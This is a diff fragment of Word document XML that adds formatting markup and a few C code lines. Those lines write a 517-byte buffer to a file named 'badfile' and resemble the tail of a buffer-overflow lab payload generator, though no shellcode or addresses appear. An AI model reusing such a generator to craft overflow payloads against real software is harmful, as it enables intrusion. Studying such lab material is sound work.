+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>("./</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>", "w");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fwrite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer, 517, 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -477,6 +6799,54 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLPreformattedChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0065704B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
+    <w:name w:val="HTML Preformatted Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="HTMLPreformatted"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="0065704B"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
